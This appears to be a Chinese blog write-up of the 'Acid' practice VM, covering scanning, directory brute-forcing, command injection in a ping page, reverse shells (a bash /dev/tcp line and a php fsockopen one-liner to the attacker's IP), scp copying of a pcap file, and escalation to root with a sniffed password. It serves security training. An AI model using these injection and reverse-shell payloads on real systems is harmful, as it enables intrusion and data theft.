Acid靶机练习

Acid靶机练习

网络结构:

环境搭建平台为VMware15,网络为nat模式,网段192.168.1.0/24

网络由攻击机kali、靶机组成

靶机ip:192.168.1.140

kali linux ip:192.168.1.137

信息收集:

主机发现:

nmap -sP 192.168.1.0/24

下图中192.168.1.1为VMnet8网卡地址,1.3为网关地址,1.137为攻击机地址,因此推测目标主机地址为192.168.1.140

image-20210203223609124

端口扫描:

可以看到目标机器使用了Apache作为中间件,开放了33447端口

nmap -p 1-65535 -A 192.168.1.140 -sV

image-20210204093237048

访问一下看看,发现是一个静态页面,扫描一下目录看看

首先用dirb扫一下,已经用了big的字典,但扫到的目录条目还是很少

image-20210204100917676

再用dirbuster爆破目录

选好字典,爆破目录选择根目录

点击start开始爆破,得到了比较全面的爆破结果

image-20210204202104586

漏洞挖掘:

访问查看各条目,challenge目录下是一个登录页面,先放着不管

image-20210204202215238

一路向下访问,到cake.php条目下的时候,可以看到标签页上出现了一个目录名Magic_Box,结合页面上的话,另外页面叫cake.php,这个目录应该是有用的

image-20210204204000254

再次爆破这个Magic_Box目录

image-20210204222202012

image-20210204224446448

得到的结果中有一个command.php,访问后发现是一个可以执行ping命令的页面

image-20210204224626144

测试命令注入,提交参数后并没有回显信息,burp抓包看一下,果然,信息是有的,只是没有直接回显到页面

image-20210204225054147

用ifconfig测试一下,发现果然存在命令注入

image-20210204225212133

尝试反弹shell

bash -i >& /dev/tcp/192.168.1.137/4444 0>&1

image-20210205175956076

kali端监听4444端口

image-20210205173317428

未果,反弹失败,尝试转url编码,依旧反弹失败

image-20210205175147349

尝试其他的反弹方式

;php -r '$sock=fsockopen("192.168.1.137",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

反弹成功

提权:

首先查看passwd文件,看一下用户

着重关注acid、saman两个用户

image-20210205200204389

查看一下这两个用户的文件

find / -user saman 2>/dev/null

image-20210205200354607

find / -user acid 2>/dev/null

image-20210205200506712

在acid的文件中可以看到一个抓包文件hunt.pcapng,显得格格不入,我们通过ssh把它复制下来,这里因为kali linux为保证安全性,ssh是默认禁止连接的,需要修改配置文件,这里我直接使用了另外一台centos来接收文件,ip为192.168.1.131

首先取得一个交互shell,以进行下一步操作,在原本shell中输入以下命令

python -c "import pty;pty.spawn('/bin/bash');"

然后使用命令scp来复制传输文件,如图传输成功

scp /sbin/raw_vs_isi/hint.pcapng root@192.168.1.131:/root/hint.pcapng

image-20210205201641880

拿到抓包文件后,用wireshark打开

image-20210205201844205

逐包查看,未果,可以分数据包种类跟踪流,查看数据包信息

追踪tcp流时,可以看到saman用户的密码

image-20210205202141370

我们切换到此用户saman,成功切换,之后再尝试用户saman切换root,发现有权限,切换成功,提权至root

image-20210205202547170

参考文章:https://www.freebuf.com/column/200518.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值